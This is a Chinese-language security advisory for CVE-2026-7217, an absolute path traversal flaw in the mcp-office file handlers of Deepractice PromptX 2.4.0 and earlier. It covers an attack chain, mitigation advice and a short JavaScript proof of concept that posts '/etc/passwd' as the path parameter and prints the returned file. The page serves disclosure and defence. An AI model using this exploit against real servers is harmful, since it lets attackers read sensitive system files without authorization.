CVE-2026-7217 Deepractice PromptX 绝对路径遍历漏洞

漏洞信息

漏洞编号

CVE-2026-7217

漏洞类型

路径遍历

CVSS评分

5.3 中危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

Deepractice PromptX

漏洞概述

Deepractice PromptX 版本2.4.0及以下存在安全漏洞。该漏洞位于Document File Handler组件的`packages/mcp-office/src/index.ts`文件中，涉及`read_docx`、`read_xlsx`等多个函数。由于未正确处理`path`参数，导致绝对路径遍历漏洞。攻击者可远程利用此漏洞，在无需认证的情况下读取系统敏感文件。目前漏洞利用代码已公开，厂商尚未响应修复。

技术细节

该漏洞根源在于Deepractice PromptX的文件处理组件（mcp-office）对用户输入的`path`参数缺乏充分的校验机制。受影响的函数包括`read_docx`、`read_xlsx`、`read_pptx`、`list_xlsx_sheets`和`read_pdf`。攻击者无需用户交互或认证权限，即可远程构造包含绝对路径（如`/etc/passwd`或Windows系统路径）的恶意请求。由于程序直接使用该参数进行文件读取操作，未能限制在预期的目录范围内，导致攻击者能够遍历服务器文件系统并读取任意文件。这种绝对路径遍历漏洞使得敏感配置文件、源代码或用户数据面临泄露风险，严重威胁系统机密性。目前该漏洞利用代码已公开披露，风险进一步增加。

攻击链分析

STEP 1

侦察

攻击者识别出目标运行的是Deepractice PromptX版本2.4.0或更低版本，并确认暴露了mcp-office相关的API接口。

STEP 2

漏洞利用

攻击者向包含`read_docx`、`read_xlsx`等函数的接口发送特制的HTTP请求，在`path`参数中填入系统敏感文件的绝对路径（如`/etc/passwd`）。

STEP 3

数据窃取

服务器端未对路径进行有效校验，直接读取并返回了攻击者指定的文件内容，攻击者成功获取系统敏感信息。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

// Proof of Concept for CVE-2026-7217
// Target: Deepractice PromptX <= 2.4.0
// Vulnerable functions: read_docx, read_xlsx, read_pptx, etc.

const axios = require('axios');

async function checkVulnerability(targetUrl) {
    // Attempt to read /etc/passwd (Linux) or C:\Windows\win.ini (Windows)
    // by exploiting the absolute path traversal in the 'path' parameter.
    
    const maliciousPayload = {
        "path": "/etc/passwd" 
    };

    try {
        // Replace with the actual vulnerable endpoint path based on the function used
        // e.g., /api/read_docx or /api/read_xlsx
        const response = await axios.post(`${targetUrl}/mcp-office/read_pdf`, maliciousPayload, {
            headers: { 'Content-Type': 'application/json' }
        });

        if (response.status === 200 && response.data) {
            console.log("[+] Vulnerability confirmed! Sensitive data leaked:");
            console.log(response.data);
        } else {
            console.log("[-] Target might not be vulnerable or patched.");
        }
    } catch (error) {
        console.error("[-] Error during exploit attempt:", error.message);
    }
}

// Usage: node exploit.js http://target-ip:port
checkVulnerability('http://localhost:3000');

影响范围

Deepractice PromptX <= 2.4.0

防御指南

临时缓解措施

在官方发布修复版本前，建议通过网络访问控制列表（ACL）限制对mcp-office组件API的访问来源，仅允许受信任的内部服务调用。同时，可在系统层面对应用服务容器的文件系统权限进行最小化配置，禁止其访问敏感系统目录（如/etc、/var/log等）。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2026-7217
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2026-7217
3 Details https://www.cvedetails.com/cve/CVE-2026-7217/
4 VulDB https://vuldb.com/cve/CVE-2026-7217
5 Link https://github.com/Deepractice/PromptX/
6 Link https://github.com/Deepractice/PromptX/issues/571
7 Link https://vuldb.com/submit/802120
8 Link https://vuldb.com/vuln/359817
9 Link https://vuldb.com/vuln/359817/cti